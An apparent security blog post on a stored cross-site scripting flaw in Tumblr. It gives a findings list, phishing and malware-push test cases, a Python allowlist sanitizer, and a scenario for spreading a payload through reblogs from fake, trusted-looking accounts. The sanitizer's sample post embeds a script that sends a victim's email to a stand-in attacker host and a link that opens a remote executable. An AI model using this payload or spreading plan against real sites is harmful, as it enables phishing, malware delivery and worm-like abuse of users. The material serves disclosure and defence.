According to my new tests, Tumblr is still vulnerable to stored Cross-site Scripting. I have reported the findings to the Tumblr development team, although they should already know: the reblog attack on the 3rd of December was based on this vulnerability. I don’t claim “credit” for this vulnerability: all details were available before I even had time to test. What surprises me is the fact that this issue is not yet fixed.

I was asked if this vulnerability is “wormable”, meaning: is it possible to perform another “Tumblr worm” attack? Why would anyone even want to try? Possible viral reblogging would be noticed and stopped fast. “Tumblr worm” was just a rather harmless demonstration.

Tumblr stored Cross-site Scripting facts

(based on my tests with two Tumblr accounts on separate PCs and three browsers)

  • It is possible to embed JavaScript and some other HTML tags in certain Tumblr post types (e.g. video posts)
  • Arbitrary JavaScript loaded from a remote server can be executed in the user’s browser
  • Before the script executes, the user needs to open the blog post or click on e.g. a video containing the JavaScript
  • The victim does not have to be logged in to Tumblr
  • JavaScript can read the browser’s cookies via document.cookie (only those belonging to the script’s own origin and not flagged HttpOnly). However, session hijacking of logged-in users is just a theoretical threat
  • JavaScript execution might be restricted to an iframe context; accessing the main window from the script might not be possible (a cross-origin frame cannot reach the parent document’s DOM or cookies)
  • If a user reblogs a malicious post, the new post includes the payload -> the code can spread

Test cases

#1 – Phishing

It would be quite easy to ask the user for input in various ways, and that input could be sent to the attacker’s server. Below is a screenshot of a simple prompt asking for the user’s email address:

#2 – Spreading malware

The attacker could push malicious files from his or her server to Tumblr users. Below is a screenshot of a simple file push using window.open:
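The facts list and the two test cases above describe a store-time problem: the post body keeps whatever HTML the author supplied, and a reblog copies that body verbatim. The following is an added example, not Tumblr’s code, of the check a practitioner would put on the write path: an allowlist sanitizer (the tag, attribute and URL-scheme allowlists for a video post are assumptions) run over a constructed sample post carrying both test-case payloads, plus a small reblog simulation showing that the payload stops propagating once every stored copy goes through the sanitizer.

```python
"""Store-time allowlist sanitizer for user-supplied post HTML (added example,
not Tumblr's code). Assumes a backend that stores a video post's raw HTML and
copies it verbatim on reblog, the propagation path described in the article."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: what a video post legitimately needs. Anything absent here
# (script, iframe, object, style, on* handlers) is removed.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "a": {"href"},
    "video": {"src", "controls", "width", "height"},
    "source": {"src", "type"},
}
VOID_TAGS = {"br", "source"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}  # drop body too


def safe_url(value):
    """Return a normalised absolute http(s) URL or None. Control characters and
    spaces are removed first: browsers ignore them inside a scheme, so
    "java<TAB>script:" still runs and validation must see what the browser sees."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    return cleaned if urlparse(cleaned).scheme in SAFE_SCHEMES else None


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitized fragments
        self.open = []     # allowed tags currently open, so close tags stay balanced
        self.skip = []     # dropped-content elements we are currently inside
        self.removed = []  # audit trail: "script", "a@href", "p@onclick", ...

    def handle_starttag(self, tag, attrs):
        if self.skip:                      # inside <script>/<iframe>/...: swallow
            if tag not in VOID_TAGS:
                self.skip.append(tag)
            return
        if tag in DROP_CONTENT_TAGS:
            self.removed.append(tag)
            self.skip.append(tag)
            return
        if tag not in ALLOWED_TAGS:        # unknown tag: drop the tag, keep its text
            self.removed.append(tag)
            return
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                self.removed.append(f"{tag}@{name}")
                continue
            if value is None:              # boolean attribute such as controls
                parts.append(name)
                continue
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:          # javascript:, data:, relative, ...
                    self.removed.append(f"{tag}@{name}")
                    continue
            parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if self.skip:
            if tag in self.skip:
                while self.skip.pop() != tag:
                    pass
            return
        if tag in self.open:
            while (popped := self.open.pop()) != tag:
                self.out.append(f"</{popped}>")
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:                   # an unclosed dropped element fails closed:
            self.out.append(f"</{self.open.pop()}>")  # its trailing text is gone
        return "".join(self.out)


def sanitize(raw_html):
    """Return (clean_html, list_of_removed_items)."""
    s = AllowlistSanitizer()
    s.feed(raw_html)
    return s.result(), s.removed


def has_active_content(body):
    return bool(sanitize(body)[1])


def store_post(raw_body):
    """What the backend should do on every write, a reblog included."""
    return sanitize(raw_body)[0]


def reblog_verbatim(body):
    """The behaviour the article describes: the body is copied as-is."""
    return body


# Constructed sample, not a real Tumblr post: a video embed carrying both
# test-case payloads (an email prompt beaconed to an attacker host, and a
# file push via window.open from a javascript: link).
MALICIOUS_POST = (
    "<p>Check this out</p>"
    '<video src="https://example.invalid/clip.mp4" controls></video>'
    "<script>"
    'var e = prompt("Enter your email to watch");'
    'new Image().src = "https://attacker.invalid/c?e=" + encodeURIComponent(e);'
    "</script>"
    "<a href=\"javascript:window.open('https://attacker.invalid/setup.exe')\">HD</a>"
)

if __name__ == "__main__":
    spread = reblog_verbatim(reblog_verbatim(MALICIOUS_POST))
    print("verbatim reblog still carries payload:", has_active_content(spread))
    clean = store_post(MALICIOUS_POST)
    print("stored:", clean)
    print("reblog of sanitized copy carries payload:", has_active_content(store_post(clean)))
```

Sanitizing on every write (rather than only on display) matters here because the reblog copies the stored body: a single unsanitized copy is enough to keep the payload circulating. The `removed` audit trail doubles as a detection signal, since a legitimate video post should never produce `script` or `a@href` entries.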

One possible attack scenario

An attacker could create several Tumblr accounts and start blogging viral or popular videos using well-chosen tags. Trust and popularity could be increased by using the other accounts to reblog the video posts. Once the “attack blog” had enough followers, the attacker could create a malicious post using carefully selected tags. If the followers reblogged the malicious post, the payload would start to spread.

Reblogging is an easy-to-use and popular Tumblr feature, similar to Twitter’s retweet or Facebook’s “like” button. An attack based on social engineering (users want to reblog interesting posts) could spread more widely than the Tumblr worm attack did.